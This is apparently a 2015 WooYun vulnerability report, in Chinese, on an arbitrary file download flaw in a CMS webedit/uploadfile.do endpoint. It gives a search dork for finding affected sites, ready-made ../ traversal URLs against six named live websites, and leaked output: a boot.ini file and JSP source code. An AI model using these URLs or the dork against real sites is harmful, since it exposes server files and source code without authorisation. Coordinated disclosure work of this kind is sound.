某建站系统任意文件下载

编号115521
Urlhttp://www.wooyun.org/bug.php?action=view&id=115521
漏洞状态已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞标题某建站系统任意文件下载
漏洞类型任意文件遍历/下载
厂商cnvd
白帽子Hero
提交日期2015-05-22 14:58:00
公开日期2015-08-24 13:40:00
修复时间(not set)
确认时间2015-05-26 00:00:00
Confirm Spend4
漏洞标签文件操作参数未加过滤
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank10
漏洞简介
"你为什么有我的源码?"
"怪我咯?"
漏洞细节

WooYun: 某建站系统通用sql注入#2
还是这套系统
存在任意文件下载
涉及中国科技教育网 与某些外贸网站
关键字: inurl:contentmanager.do?method=view
漏洞页面:webedit/uploadfile.do?action=open&filepath=
实例:
http://www.cnstedu.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://kxsz.gdec.net/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.cimuset.org/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.fdstmc.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.chinaworldmall.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.sqkpym.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
www.cnstedu.cn

1.png


$NCJL179FJQ%Z@LS1DATQ1T.png


%VKQF@TC)QU5{H_G8R%W$]L.png


QU45)AB6YW5@0][E_6F4FVE.png


...

POC

boot.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(1)partition(2)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(1)partition(2)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect


cms/cmsapp/search.jsp

<%@ page import="com.jalor.cms.column.CMSColumn,
com.jalor.util.treemodel.FolderPath,
com.jalor.util.Function,
com.jalor.cms.actionform.ContentForm,
com.jalor.cms.actionform.ContentAttachmentForm,
com.jalor.cms.content.ContentAttachment,
java.util.Collection,
java.util.Iterator,
java.util.Properties,
com.jalor.cms.actionform.ColumnForm"%>
<%@ page contentType="text/html;charset=GBK" language="java" %>
<%@ taglib uri = "/WEB-INF/jalorportal.tld" prefix = "portal"%>
<%@ taglib uri = "/WEB-INF/jalorcms.tld" prefix = "cms"%>
<%@ taglib uri="/WEB-INF/struts-html.tld" prefix="html" %>
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>
<%@include file="/include/currentuserinfo.jsp"%>
<%@include file="/include/pageexpires.jsp"%>
<%@include file="/include/filepath.jsp"%>
<%
ColumnForm column=(ColumnForm)request.getAttribute("CMSColumnForm");
String url="";
%>
<portal:moduleconfig>
<logic:iterate id="pathinfo" name="columnpath" scope="request">
<%
FolderPath folderPath=(FolderPath)pageContext.getAttribute("pathinfo");
String name=folderPath.getFoldername();
url="/cms/columnmanager.do?method=list&id="+folderPath.getFolderid();
%>
<portal:navigation name="<%=name%>" url="<%=url%>"/>
</logic:iterate>
<%
String columnurl="/cms/columnmanager.do?method=list&id="+column.getId();
%>
<portal:navigation name="<%=column.getName()%>" url="<%=columnurl%>"/>
<portal:pagetab name="搜索" url=""/>
<portal:toolbutton name="返回" url="<%=columnurl%>" image=""/>
</portal:moduleconfig>
<portal:standardstyle insertTemplate="standardheader.vm"/>
<script language="javascript">
</script>
<form action="/cms/contentattachment" method="post">
<input type="hidden" name="method" value="search">
<input type="hidden" name="columnid" value="<%=column.getId()%>">
<table width="90%" bordercolorlight="#000000" bordercolordark="#ffffff" class="labeltable_middle_table">
<tr>
<td class="labeltable_middle_td" align="center">标题</td>
<td class="labeltable_middle_td" align="center">作者</td>
</tr>
<%
Collection lstResult=(Collection)request.getAttribute("resultset");
for(Iterator it=lstResult.iterator();it.hasNext();)
{
Properties prop=(Properties)it.next();
%>
<tr>
<td><a href="/cms/contentmanager.do?method=edit&pageid=edit&columnid=<%=column.getId()%>&templateid=<%=column.getTemplateid()%>&id=<%=prop.getProperty("contentid")%>"><%=prop.getProperty("title","")%></a></td>
<td><%=prop.getProperty("author","")%></td>
</tr>
<%
}
%>
</table>
</form>
<portal:standardstyle insertTemplate="standardfooter.vm" />


修复方案

目录限制权限?

状态信息 2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-26: 厂商已经确认,细节仅向厂商公开
2015-05-29: 细节向第三方安全合作伙伴开放
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开
厂商回复CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。
回应信息危害等级:高漏洞Rank:10 确认时间:2015-05-26 13:38